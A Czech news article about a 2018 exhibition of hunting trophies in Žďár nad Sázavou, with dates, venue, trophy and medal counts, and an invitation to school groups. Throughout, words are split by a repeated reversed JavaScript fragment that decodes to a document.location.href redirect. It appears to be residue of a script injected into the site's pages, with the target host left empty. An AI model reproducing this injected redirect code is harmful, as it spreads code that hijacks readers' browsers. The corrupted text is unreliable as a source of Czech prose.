Rainbow page separator

Myslivci vystaví ve Ždáře lovecké trofeje ulovené v loňském roce

Úterý, 20. března 2018

Žďár nad Sázavou / Okresní myslivecký spolek ve Ždáře nad Sázavou ve spolupráci s městskými úřady Ždár nad Sázavou, Bystřice nad Pernštejnem, Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě, Velké Meziříčí a KÚ kraje Vysočina pořádá při příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti chovatelské přehlídky výstavu trofejí zvěře ulovené v roce 2017 v honitbách okresu Žďár nad Sázavou a oblasti chovu jelení zvěře „Žďárské vrchy“.

Výstava se koná ve dnech 23.-25. března 2018 ve velkém sále Hasičské pojišťovny, Komenského 1, ve Ždáře nad Sázavou. Prohlídka je pro veřejnost otevřena denně od 8:00 do 17:00 hodin. Bude zde doprovodný prodej mysliveckých potřeb, výrobků z paroží, mysliveckého oblečení, zvěřinových uzenin. Na občerstvení je zajištěna bohatá zvěřinová kuchyně.

Na le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní chovatelské přehlídce bude vystaveno 1350 trofejí ze 127 honiteb Ždárska. Celkem 50 ks trofejí zvěře bylo předběžně ohodnoceno body CIC odpovídajícím udělení medailové hodnoty. Je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to 24 srnců, 5 muflonů, 2 daňci, 1 jelen evropský, 14 lišek, 2 prasata a 2 jezevci. Podle hodnoty medailí pak je 8 zlatých, 14 stříbrných a 28 bronzových, což svědčí o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom, že na žďársku myslivci chovají velmi kvalitní zvěř.

Bude zde vidět, zda myslivci lovili odstřelové kusy spárkaté zvěře tak, jak jim [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ukládá zákon. O přehlídce jsou prezen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továny výsledky kontroly odborné komise, která hodnotila trofeje a spodní čelisti spárkaté zvěře. Posuzovala správnost, či nesprávnost provedeného odlovu. Za nesprávně provedený odlov nadějného kusu, nebo mimořádně nadějného kusu zvěře, je myslivec hodnocen na následné přehlídce trofejí červeným bodem, nebo červeným bodem v kolečku. Je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to špatný chovatelský zásah, kdy zvěř mohla dosáhnout lepší trofeje a mít další kvalitní po[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomstvo. Lovem musí být z chovu odstraňována zvěř nehodící se do dalšího chovu. Je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zvěř nemocná, přestárlá vývojově slabá. U trofejové zvěře musí lovec odhadnout, kdy už je kus ve vrcholové formě a poté by už jeho kondice jenom klesala, či ještě může vyspět.

V pátek 23.3.2018 bychom uvítali návštěvu školní mládeže. Každé skupině žáků zajistíme doprovod výstavou s odborným výkladem. Mládež zde pochopí smysl a význam myslivosti v České republice pro zachování živé přírody. Pochopí, že myslivost není jen o lovu, jak je bohužel mnohdy prezen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továno.

Bc. Stanislav Císař, předseda Kulturně-propagační komise
a člen Okresní myslivecké rady OMS Žďár nad Sázavou

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tohalama/“ target=“_blank“ rel=“noopener noreferrer“>www.pho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tohalama.com